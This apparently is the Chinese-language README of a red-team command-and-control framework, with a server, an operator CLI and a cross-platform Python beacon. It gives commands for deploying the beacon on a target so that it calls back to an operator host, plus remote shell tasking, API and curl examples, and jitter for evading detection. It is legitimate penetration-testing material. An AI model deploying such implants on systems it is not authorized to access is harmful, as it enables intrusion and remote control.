pythernel/SpectreC2

GitHub: pythernel/SpectreC2

SpectreC2 是一个采用 AES-256-GCM 加密通信的跨平台命令与控制框架，专为红队操作和渗透测试场景设计。

Stars: 0 | Forks: 0

# 👻 SpectreC2 **加密命令与控制框架，支持 AES-256-GCM beaconing、多平台植入体以及 REST API** ![Python](https://img.shields.io/badge/python-3.9%2B-blue?style=flat-square&logo=python) ![Version](https://img.shields.io/badge/version-1.0.0-red?style=flat-square) ![License](https://img.shields.io/badge/license-MIT-green?style=flat-square) ![Platform](https://img.shields.io/badge/platform-cross--platform-lightgrey?style=flat-square) ``` ╔═══════════════════════════════════════════════════════╗ ║ ║ ║ ███████ ██████ ███████ ██████ ████████ ██████ ║ ║ ██ ██ ██ ██ ██ ██ ██ ║ ║ ███████ ██ █████ ██ ██ ██████ ║ ║ ██ ██ ██ ██ ██ ██ ██ ║ ║ ███████ ██████ ███████ ██████ ██ ██ ██ ║ ║ ║ ║ Encrypted Command & Control Framework ║ ║ ║ ╚═══════════════════════════════════════════════════════╝ ```

## 目录 - [概述](#overview) - [功能](#features) - [架构](#architecture) - [快速开始](#quick-start) - [API 文档](#api-documentation) - [用法示例](#example-usage) - [项目结构](#project-structure) - [截图](#screenshots) - [许可证](#license) - [致谢](#credits) ## 概述 **SpectreC2** 是一个轻量级的加密命令与控制框架，专为操作安全任务设计。服务器、客户端和植入体之间的所有通信均使用 **AES-256-GCM** 进行加密，并支持每条消息使用独立的 nonce 以及可选的 HMAC-SHA256 完整性验证。该框架由三个核心组件组成： | 组件 | 描述 | |-----------|-------------| | **C2 Server** | HTTP/JSON REST API 服务器。通过 SQLite 管理 beacon、任务、listener 和持久化。 | | **Admin Client** | 基于 CLI 的操作员控制台。提供交互式 shell、任务分发和 beacon 枚举功能。 | | **Implant** | 轻量级 Python beacon。负责注册、签入、执行任务以及外发结果。 | ## 功能 - **AES-256-GCM 加密** — 所有 beacon 数据均使用 256 位密钥和 12 字节随机 nonce 加密 - **HMAC-SHA256 完整性** — 可选的消息签名机制，用于检测篡改行为 - **多平台植入体** — Python beacon 可在 Windows、Linux 和 macOS 上运行，无需任何原生依赖 - **REST API** — 完整的 HTTP/JSON API，便于自动化和集成 - **SQLite 后端** — 持久化存储 beacon、任务和 listener - **交互式 Shell** — 支持输出流式传输的内联 shell 会话 - **Listener 管理** — 动态创建和管理多个 C2 listener - **可配置的 Beaconing** — 可调整的睡眠间隔和抖动，用于规避 C2 流量检测 - **完整性检查** — Beacon 上报用户完整性级别（管理员/用户） - **启用 CORS** — 为基于 Web 的管理面板提供跨域支持 - **单文件植入体** — Beacon 可以作为独立脚本运行，无需 pip install ## 架构 ``` ┌─────────────────┐ AES-256-GCM ┌──────────────────┐ │ │ ◄───────────────────► │ │ │ Admin Client │ REST API │ C2 Server │ │ (CLI / Web) │ │ :8443 /api/* │ │ │ │ │ └─────────────────┘ └────────┬──────────┘ │ ┌─────────┴──────────┐ │ │ │ SQLite (data/) │ │ beacons / tasks │ │ listeners │ └─────────────────────┘ ▲ │ AES-256-GCM │ HTTPS polling │ ┌─────────┴──────────┐ │ │ │ Implant / Beacon │ │ (Python, cross- │ │ platform) │ │ │ └─────────────────────┘ ``` ### 通信流程 1. **Implant 注册** — Implant 将使用 AES-256-GCM 加密的系统指纹发送至 `/api/beacon/register` 2. **Beaconing（签入）** — Implant 以可配置的间隔（带抖动）轮询 `/api/beacon/checkin` 3. **任务分发** — 操作员通过 CLI 或 API 向 `/api/task/create` 发送命令 4. **任务执行** — Implant 获取待处理任务，执行任务，并将结果发送至 `/api/beacon/result` 5. **Admin 身份验证** — 客户端通过 `/api/auth` 进行身份验证，以接收会话 token ## 快速开始 ### 前置条件 - Python 3.9+ - `pip` (Python 包管理器) ### 1. 安装依赖 ``` pip install -r requirements.txt ``` ### 2. 启动 C2 Server ``` python -m server.c2_server --host 0.0.0.0 --port 8443 --password spectre ``` 服务器在启动时会生成一个唯一的管理员 token，并将其打印到控制台。 ### 3. 启动 Admin Client ``` python -m client.c2cli http://127.0.0.1:8443 spectre ``` ### 4. 创建 Listener ``` c2> listener default 8443 [+] Listener 'default' created [+] Beacon key: aB3dEfGhIjKlMnOpQrStUvWxYz... ``` ### 5. 部署 Beacon ``` # 在目标机器上： python beacon.py http://:8443 --sleep 5 --jitter 0.3 ``` Beacon 将在几秒钟内完成注册、开始签入，并显示在 Admin Client 中。 ### 6. 列出 Beacon 并下发命令 ``` c2> beacons ID HOSTNAME USER OS LAST SEEN ------------------------------ ------------------ --------------- -------------------- ------------------------- DESKTOP-abc123 DESKTOP-ABC123 operator Windows 10 2026-06-07T14:23:11 c2> task DESKTOP-abc123 shell whoami [>] Task a1b2c3d4 sent to DESKTOP-abc123 ``` ## API 文档所有 endpoint 均返回 JSON。Beacon 和服务器之间的请求和响应在这些 payload 之外使用 AES-256-GCM 加密。 ### 身份验证 #### `POST /api/auth` 作为操作员进行身份验证并接收会话 token。 **请求：** ``` { "password": "spectre" } ``` **响应：** ``` { "status": "ok", "token": "abcdef1234567890abcdef1234567890" } ``` ### Beacons #### `POST /api/beacon/register` 注册带有系统元数据的新 beacon。 **请求：** ``` { "id": "DESKTOP-abc123-a1b2c3", "hostname": "DESKTOP-ABC123", "username": "operator", "os": "Windows 10", "arch": "AMD64", "internal_ip": "192.168.1.100", "external_ip": "1.2.3.4", "pid": 12345, "integrity": "admin" } ``` **响应：** ``` { "status": "ok", "beacon_id": "DESKTOP-abc123-a1b2c3" } ``` #### `POST /api/beacon/checkin` Beacon 签入。返回待执行的任务。 **请求：** ``` { "id": "DESKTOP-abc123-a1b2c3" } ``` **响应：** ``` { "status": "ok", "tasks": [ { "id": "a1b2c3d4", "command": "shell", "args": "whoami" } ] } ``` #### `POST /api/beacon/result` 提交任务执行结果。 **请求：** ``` { "task_id": "a1b2c3d4", "result": "DESKTOP-ABC123\\operator\n", "error": "" } ``` **响应：** ``` { "status": "ok" } ``` #### `GET /api/beacons` 列出所有活跃的 beacon。 **响应：** ``` { "beacons": [ { "id": "DESKTOP-abc123-a1b2c3", "hostname": "DESKTOP-ABC123", "username": "operator", "os_info": "Windows 10", "internal_ip": "192.168.1.100", "external_ip": "1.2.3.4", "pid": 12345, "arch": "AMD64", "integrity": "admin", "first_seen": "2026-06-07T14:20:00+00:00", "last_seen": "2026-06-07T14:23:11+00:00", "active": 1 } ] } ``` #### `GET /api/beacons/{beacon_id}` 获取特定 beacon 的详细信息。 **响应：** ``` { "id": "DESKTOP-abc123-a1b2c3", "hostname": "DESKTOP-ABC123", "username": "operator", "os_info": "Windows 10", "first_seen": "2026-06-07T14:20:00+00:00", "last_seen": "2026-06-07T14:23:11+00:00", "active": 1 } ``` #### `GET /api/beacons/{beacon_id}/tasks` 列出 beacon 的所有任务（过去和现在）。 **响应：** ``` { "tasks": [ { "id": "a1b2c3d4", "beacon_id": "DESKTOP-abc123-a1b2c3", "command": "shell", "args": "whoami", "status": "completed", "result": "DESKTOP-ABC123\\operator\n", "error": "", "created_at": "2026-06-07T14:22:00+00:00", "completed_at": "2026-06-07T14:22:01+00:00" } ] } ``` ### 任务 #### `POST /api/task/create` 为 beacon 创建新任务。**需要 `X-Token` header。** **请求：** ``` { "beacon_id": "DESKTOP-abc123-a1b2c3", "command": "shell", "args": "whoami" } ``` **响应：** ``` { "status": "ok", "task_id": "a1b2c3d4" } ``` ### Listeners #### `GET /api/listeners` 列出所有活跃的 listener。 **响应：** ``` { "listeners": [ { "name": "default", "bind_host": "0.0.0.0", "bind_port": 8443, "protocol": "http", "created_at": "2026-06-07T14:15:00+00:00", "active": 1 } ] } ``` #### `POST /api/listener/create` 创建新 listener。生成用于 beacon 加密的唯一 AES-256-GCM 密钥。**需要 `X-Token` header。** **请求：** ``` { "name": "external", "host": "0.0.0.0", "port": 8443, "protocol": "http" } ``` **响应：** ``` { "status": "ok", "key": "aB3dEfGhIjKlMnOpQrStUvWxYz0123456789+/ABCDEFGH==" } ``` ## 用法示例 ### 交互式 Shell 会话 ``` # Terminal 1 — 启动服务器 $ python -m server.c2_server --host 0.0.0.0 --port 8443 --password spectre ╔══════════════════════════════════════╗ ║ SpectreC2 v1.0 ║ ║ Encrypted C2 Framework ║ ║══════════════════════════════════════║ ║ Host: 0.0.0.0 ║ ║ Port: 8443 ║ ╚══════════════════════════════════════╝ [14:15:00] | INFO | Listening on 0.0.0.0:8443 ``` ``` # Terminal 2 — 启动 admin client $ python -m client.c2cli http://127.0.0.1:8443 spectre [+] Authenticated SpectreC2 Client — type 'help' for commands c2> listener default 8443 [+] Listener 'default' created [+] Beacon key: aB3dEfGhIjKlMnOpQrStUvWxYz... ``` ``` # Terminal 3 — 在目标上部署 beacon $ python implant/beacon.py http://10.0.0.5:8443 aB3dEfGhIjKlMnOpQrStUvWxYz... --sleep 3 --jitter 0.2 [+] Beacon DESKTOP-abc123-a1b2c3 active ``` ``` # 回到 Terminal 2 — 与 beacon 交互 c2> beacons ID HOSTNAME USER OS LAST SEEN ------------------------------ ------------------ --------------- -------------------- ------------------------- DESKTOP-abc123 DESKTOP-ABC123 operator Windows 10 2026-06-07T14:23:11 c2> task DESKTOP-abc123 shell whoami [>] Task a1b2c3d4 sent to DESKTOP-abc123 c2> shell DESKTOP-abc123 [*] Interactive shell to DESKTOP-abc123 [*] Type 'exit' to quit c2@DESKTOP> ipconfig [>] Task b2c3d4e5 sent to DESKTOP-abc123 c2@DESKTOP> systeminfo | findstr "OS" [>] Task c3d4e5f6 sent to DESKTOP-abc123 c2@DESKTOP> exit ``` ### 编程式 API 用法 (Python) ``` import requests server = "http://127.0.0.1:8443" # 认证 r = requests.post(f"{server}/api/auth", json={"password": "spectre"}) token = r.json()["token"] print(f"Token: {token}") # 列出 beacons headers = {"X-Token": token} r = requests.get(f"{server}/api/beacons", headers=headers) for b in r.json().get("beacons", []): print(f" {b['id']} — {b['hostname']} ({b['internal_ip']})") # 创建 task r = requests.post(f"{server}/api/task/create", headers=headers, json={ "beacon_id": "DESKTOP-abc123-a1b2c3", "command": "shell", "args": "whoami" }) print(f"Task ID: {r.json()['task_id']}") ``` ### cURL 示例 ``` # 认证 curl -s http://127.0.0.1:8443/api/auth \ -X POST -H "Content-Type: application/json" \ -d '{"password":"spectre"}' # 列出 beacons curl -s http://127.0.0.1:8443/api/beacons \ -H "X-Token: " # 创建 task curl -s http://127.0.0.1:8443/api/task/create \ -X POST \ -H "Content-Type: application/json" \ -H "X-Token: " \ -d '{"beacon_id":"DESKTOP-abc123-a1b2c3","command":"shell","args":"whoami"}' # 创建 listener curl -s http://127.0.0.1:8443/api/listener/create \ -X POST \ -H "Content-Type: application/json" \ -H "X-Token: " \ -d '{"name":"external","port":8443}' ``` ## 项目结构 ``` SpectreC2/ ├── crypto.py # AES-256-GCM encryption module ├── requirements.txt # Python dependencies ├── server/ │ ├── __init__.py │ ├── c2_server.py # HTTP/JSON C2 server (REST API) │ └── database.py # SQLite persistence layer ├── client/ │ ├── __init__.py │ └── c2cli.py # CLI admin client (interactive) ├── implant/ │ ├── __init__.py │ └── beacon.py # Cross-platform Python beacon └── README.md ``` ## 截图 ### 服务器启动 ``` [Console output placeholder — server banner with host, port, and token] ``` ### Admin Client — Beacon 列表 ``` [Console output placeholder — tabular display of active beacons] ``` ### 交互式 Shell 会话 ``` [Console output placeholder — interactive shell commands and output] ``` ## 许可证基于 MIT 许可证分发。更多信息请参阅 `LICENSE`。 ## 致谢 **SpectreC2** 的构建仅用于教育和授权的安全测试目的。 - **加密后端：** [cryptography.io](https://cryptography.io) — 通过 `hazmat.primitives.ciphers.aead.AESGCM` 实现 AES-256-GCM - **灵感来源：** Project Havoc、Covenant、Sliver、Mythic — 现代 C2 生态

**请负责任地使用。仅测试您拥有或获得书面授权评估的系统。**

标签：C2框架, IP 地址批量处理, Python, 安全学习资源, 无后门, 网络信息收集, 逆向工具